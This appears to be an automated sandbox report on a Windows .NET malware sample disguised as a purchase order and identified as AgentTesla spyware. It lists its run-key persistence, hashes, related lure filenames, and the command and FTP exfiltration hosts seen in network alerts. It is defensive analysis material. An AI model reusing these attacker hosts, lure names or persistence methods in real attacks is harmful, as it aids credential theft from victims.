                        ftp.alternatifplastik.comTurkey
                        3188ALASTYRTRtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523145
                        Start date and time:2024-10-01 07:30:28 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 32s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:14
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PO_9876563647-FLOWTRONIX (FT)UUE.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 89%
                        • Number of executed functions: 458
                        • Number of non-executed functions: 28
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        07:31:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xpnzea C:\Users\user\AppData\Roaming\Xpnzea.exe
                        07:31:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xpnzea C:\Users\user\AppData\Roaming\Xpnzea.exe
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        67.212.175.162BITUMEN_60-70_-_JUMBO_Specification.exeGet hashmaliciousFormBook, NSISDropperBrowse
                        • www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
                        EL-515-_HEAT_TRACING.exeGet hashmaliciousFormBook, NSISDropperBrowse
                        • www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
                        5.2.84.236Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                          PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                              Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                  Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                    Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=http://5ln.gpr.carfield.com.tr./?YYY%3A%2F%2F%23.bWljaGFlbC5keWtlc0BjZXFsZC5vcmcuYXU=Get hashmaliciousUnknownBrowse
                                        KAL_00192839403-28122021.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                          Halkbank.cmd.exeGet hashmaliciousAgentTeslaBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            wymascensores.comRichardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 67.212.175.162
                                            Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            Su documento de env#U00edo--------pdf.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            1715875158543a5e3b677362bc060cf9b6a7a69e2457d0c48ef2d6bda0e2ce3c4ddc38a017752.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            Teklif 8822321378 .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 67.212.175.162
                                            rDocumentodeembarque.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 67.212.175.162
                                            ORGB.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            ftp.alternatifplastik.comRichardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 5.2.84.236
                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            SINGLEHOP-LLCUShttps://sandbox-2.digital68.com/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            https://ebookkeepers.com.pk/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            http://dev-bdvonlinecreditos.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            https://dev-bdvemprendeven.pantheonsite.io/Get hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            http://dev-cdn370.pantheonsite.ioGet hashmaliciousUnknownBrowse
                                            • 198.143.164.252
                                            Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 67.212.175.162
                                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                            • 172.96.187.60
                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 67.212.175.162
                                            ALASTYRTRRichardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Teklif-6205018797-6100052155-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                            • 5.2.84.221
                                            BROU_Copia de Pago_PDF.exeGet hashmaliciousUnknownBrowse
                                            • 5.2.84.221
                                            Offer-CNVN-82927-VIETNAM.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 5.2.84.236
                                            eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                            • 5.2.85.36
                                            OFFER-876355- Hydraulic Partner, LLC.PDF..........................exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            Product Specification Details 8576534-872.exeGet hashmaliciousAgentTeslaBrowse
                                            • 5.2.84.236
                                            http://www.idecon.com.trGet hashmaliciousUnknownBrowse
                                            • 5.2.84.231
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0e2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            invoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 67.212.175.162
                                            No context
                                            Process:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):537600
                                            Entropy (8bit):5.449510671154793
                                            Encrypted:false
                                            SSDEEP:12288:zjEd+1wfcT78ZE9mBMnliO+CDbX1AlVtFtu6B:zjEdRfcT78ZE9munli/CDbXulDHu6B
                                            MD5:0FD28ED18E522B9EEF69B57AA8BDBF8F
                                            SHA1:5EBA649F7E0CEAD07E1788973B9DEAE4C54E7A46
                                            SHA-256:3996FDEC3CEAC6027730777EC99F6870A9C76E3904A1D2C78CEF954A7484090E
                                            SHA-512:35C1798D1088999A2C605134525FC6D17BCBF5C9F25910C295992F9FA599965A857505F0570614B62DE65CD9A24525636F6144D20F014E2E661DF781C45B90D9
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 47%
                                            • Antivirus: Virustotal, Detection: 33%, Browse
                                            Reputation:low
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.f.................*...........I... ...`....@.. ....................................`..................................H..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......p................................................................*...(....*...(....*.0..W....... ........8........E............8....*("...(........o.... ....~....{'...9....& ....8.......(....*&~.......*...~....*..0.......... ........8........E................8.....s...... ....~....{....:....& ....8........E........'.......8....... ....~....{....9....& ....8.......r...p(...... ....~....{....9....& ....8........E........8..........9[... ....~....{....:....& ....8......
                                            Process:C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.449510671154793
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:PO_9876563647-FLOWTRONIX (FT)UUE.exe
                                            File size:537'600 bytes
                                            MD5:0fd28ed18e522b9eef69b57aa8bdbf8f
                                            SHA1:5eba649f7e0cead07e1788973b9deae4c54e7a46
                                            SHA256:3996fdec3ceac6027730777ec99f6870a9c76e3904a1d2c78cef954a7484090e
                                            SHA512:35c1798d1088999a2c605134525fc6d17bcbf5c9f25910c295992f9fa599965a857505f0570614b62de65cd9a24525636f6144d20f014e2e661df781c45b90d9
                                            SSDEEP:12288:zjEd+1wfcT78ZE9mBMnliO+CDbX1AlVtFtu6B:zjEdRfcT78ZE9munli/CDbXulDHu6B
                                            TLSH:53B45F07B94F99F1E9441F7AC69B15404BA9D69037EFC71E798A23A607C37AAFC01207
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.f.................*...........I... ...`....@.. ....................................`................................
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x48490e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66FA6F9C [Mon Sep 30 09:30:04 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x848c00x4b.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x588.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x829140x82a00c5ea1b2074df9b61bde3752dad4a96fbFalse0.4205704246411483SysEx File - Victor5.45514582006557IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x860000x5880x6006d4802b7bcdbf8aa10259b272b66a0a2False0.4153645833333333data4.032121392018966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x880000xc0x2002a79473b288374d8661e3566dbbf1beeFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x860a00x2fcdata0.43848167539267013
                                            RT_MANIFEST0x8639c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-01T07:31:26.751565+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.849705TCP
                                            2024-10-01T07:31:26.751565+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.849705TCP
                                            2024-10-01T07:31:32.844326+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.8497065.2.84.23621TCP
                                            2024-10-01T07:31:33.460095+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497075.2.84.23663484TCP
                                            2024-10-01T07:31:33.465327+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497075.2.84.23663484TCP
                                            2024-10-01T07:31:42.581347+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.849710TCP
                                            2024-10-01T07:31:42.581347+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.849710TCP
                                            2024-10-01T07:31:48.017800+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.8497125.2.84.23621TCP
                                            2024-10-01T07:31:48.642241+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497135.2.84.23661512TCP
                                            2024-10-01T07:31:48.647690+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497135.2.84.23661512TCP
                                            2024-10-01T07:31:50.753234+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.849714TCP
                                            2024-10-01T07:31:50.753234+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.849714TCP
                                            2024-10-01T07:31:56.098704+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.8497155.2.84.23621TCP
                                            2024-10-01T07:31:56.716214+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497165.2.84.23664722TCP
                                            2024-10-01T07:31:56.721436+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.8497165.2.84.23664722TCP
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 07:31:25.515207052 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:25.515259027 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:25.515353918 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:25.527388096 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:25.527404070 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.036952019 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.037081003 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.046119928 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.046137094 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.046727896 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.100837946 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.520462036 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.563416958 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642294884 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642317057 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642338991 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642344952 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642456055 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.642478943 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.642491102 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.662949085 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.662988901 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.663084030 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.663094044 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.663110971 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.710251093 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.730221987 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.730236053 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.730261087 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.730359077 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.730478048 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.731228113 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.731235027 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.731261969 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.731308937 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.731326103 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.732831955 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.732837915 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.732897043 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.751626968 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.751636982 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.751763105 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.818727016 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.818741083 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.818873882 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.819183111 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.819190025 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.819258928 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.819780111 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.819844007 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.820619106 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.820710897 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.821566105 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.821635962 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.822422981 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.822483063 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.823177099 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.823237896 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.840289116 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.840399027 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.907322884 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.907430887 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.907815933 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.907902956 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.908286095 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.908353090 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.908701897 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.908752918 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.909199953 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.909260988 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.909301043 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.909373045 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910131931 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910214901 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910218954 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910229921 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910305977 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.910337925 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.910408020 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.911166906 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911292076 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.911292076 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911302090 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.911370039 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912162066 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912210941 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912210941 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912230015 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:26.912271976 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.912271976 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:26.926873922 CEST49705443192.168.2.867.212.175.162
